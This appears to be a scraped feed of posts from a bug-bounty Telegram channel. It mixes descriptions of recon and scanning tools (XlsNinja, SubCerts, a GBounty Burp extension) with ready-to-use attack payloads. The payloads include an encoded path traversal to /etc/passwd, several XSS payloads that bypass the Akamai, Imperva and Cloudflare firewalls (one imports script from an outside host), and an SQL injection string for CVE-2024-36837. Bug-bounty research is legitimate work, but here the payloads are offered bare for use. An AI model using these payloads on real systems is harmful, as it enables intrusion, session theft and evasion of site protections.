Payload:

%2F..%2F..%2Fetc%2Fpasswd

#XSS #Payload
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

LazyDork Tool is Google dorker tool help during google dorking link

🔗 Site

#Google #Dork #Maker
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

XlsNinja: Multi-Vulnerability Scanner

💬
XlsNinja is a powerful and versatile multi-vulnerability scanner designed to detect various web application vulnerabilities, including Local File Inclusion (LFI), Open Redirects (OR), SQL Injection (SQLi), and Cross-Site Scripting (XSS). This tool was created by AnonKryptiQuz, Coffinxp, Hexsh1dow, and Naho.

📊 Features:
⚪️ LFI Scanner: Detect Local File Inclusion vulnerabilities.
⚪️ OR Scanner: Identify Open Redirect vulnerabilities.
⚪️ SQL Scanner: Detect SQL Injection vulnerabilities.
⚪️ XSS Scanner: Identify Cross-Site Scripting vulnerabilities.
⚪️ Multi-threaded scanning: Improved performance through multi-threading.
⚪️ Customizable payloads: Adjust payloads to suit specific targets.
⚪️ Success criteria: Modify success detection criteria for specific use cases.
⚪️ User-friendly command-line interface: Simple and intuitive.
⚪️ Save vulnerable URLs: Option to save the results of vulnerable URLs to a file.

🔼 Installation:

cd lostools
pip install -r requirements.txt
python xlsniNja.py

😸 Github

⬇️ Download
🔒 BugCod3

#Multi #Vulnerability #Scanner
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

Top 15 Vulnerability Scanners🔍📝

#Top #Vulnerability #Scanners
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

XSS Bypass Akamai, Imperva and CloudFlare

Payload:
<A HRef=//X55.is AutoFocus %26%2362 OnFocus%0C=import(href)>

#XSS #Payload
➖➖➖➖➖➖➖➖➖➖
📣 T.me/BugCod3
📣 T.me/Root_Exploit

SQLI Injection
CVE: 2024-36837

Payload:

0-3661)%20OR%20MAKE_SET(8165=8165,7677)%20AND%20(4334=4334 

#BugBounty #Tips
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

JS Recon for IP, Hostname, URL from Waybackurls + LazyEgg

waybackurls target | grep '\.js$' | awk -F '?' '{print $1}' | sort -u | xargs -I{} bash -c 'python lazyegg[.]py "{}" --js_urls --domains --ips' > jsurls && cat jsurls | grep '\.' | sort -u

#BugBounty #Tips
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

XSS in Office.com. The + made a difference.

Payload:‍‍‍

`'>+<noscript>alert()</noscript>`

#BugBounty #Tips #XSS
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

SubCerts

💬
SubCerts is an automated tool designed to extract subdomains from certificate transparency logs using the crt.sh API. This tool allows security researchers, penetration testers, and developers to identify subdomains of a target domain by leveraging publicly available certificates.

📊 Features:
⚪️ Subdomain Extraction: Utilizes crt.sh, a certificate transparency log search engine, to gather subdomains associated with a target domain.

⚪️ HTTP Probing: Automatically sends HTTP/HTTPS requests to each extracted subdomain using httpx and
returns:
⚫️ HTTP status codes
⚫️ Page noscripts
⚫️ Silent output for clean and organized results

⚪️ Automation: Run the tool with a simple command and get results efficiently without manual effort.

⚪️ Flexible Output: Optionally save the extracted subdomains and httpx results to a file for later review.

🔼 Installation:

cd SubCerts
chmod +x *.sh
./setup.sh
./subcerts.sh -h

💻 Usage:
To run SubCerts for a domain and save the results to a file:

./subcerts.sh -u example.com --output results.txt

😸 Github

⬇️ Download
🔒 BugCod3

#BugBounty #SubDomain #certificate
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

WAF bypass payloads

- Imperva/AWS
<details/open/id="&quot;"ontoggle=[JS]>

- Akamai
<details open id="' &quot;'"ontoggle=[JS]>``

#WAF #Bypass
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

XSS

Watch out for reflected XSS in the search parameter!

Payload:

"-->""/>Hack by Fagun</noscript><deTailS open x=">" ontoggle=(co\u006efirm)``>"

#XSS #BugBounty #Tips
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

Export to GBounty

💬
Export to GBounty is a Burp Suite extension developed using the Montoya API. It allows users to export selected HTTP requests from Burp Suite, including the Site Map Tree, Repeater, and Message Editor, into a compressed ZIP file. This ZIP file can be directly used with the GBounty scanner using the command ‍`gbounty -rf requests.zip`, enabling streamlined vulnerability scanning and management.

📊 Features:
⚪️ Effortless Export: Easily export selected HTTP requests from multiple sources within Burp Suite.
⚪️ Compressed Format: Saves requests in a ZIP archive, optimizing storage and transfer.
Unique File Naming: Each request is saved as a uniquely named text file within the ZIP to prevent conflicts.
⚪️ Wide Compatibility: Supports exporting from Site Map Tree, Repeater, Message Editor, and other compatible tools.
⚪️ User-Friendly Interface: Adds a context menu option "Export to GBounty" for a seamless user experience.
⚪️ Robust Error Handling: Provides clear notifications regarding the export status, including overwrite confirmations and error messages.

🔼 Installation:
Prerequisites
⚪️ Java Development Kit (JDK): Ensure you have JDK 8 or higher installed.
⚪️ Burp Suite: The extension is compatible with Burp Suite Professional and Burp Suite Community.

💻 Usage:
Select Requests to Export:

Within Burp Suite, select the HTTP requests you wish to export from the Site Map Tree, Repeater, Message Editor, or other supported tools.

📂 Export Requests:
Right-click on the selected requests. Choose the Export to GBounty option from the context menu.

📂 Run GBounty Scanner:
Use the exported ZIP file with the GBounty scanner by executing the following command in your terminal:

gbounty -rf requests.zip

😸 Github

⬇️ Download
🔒 BugCod3

#BugBounty #Tips #GBounty
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

XٓSS

Bypass #Akamai, #Imperva and #CloudFlare WAF 🧱🔥

<A HRef=//X55.is AutoFocus %26%2362 OnFocus%0C=import(href)>

#BugBounty #Tips #Bypass
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3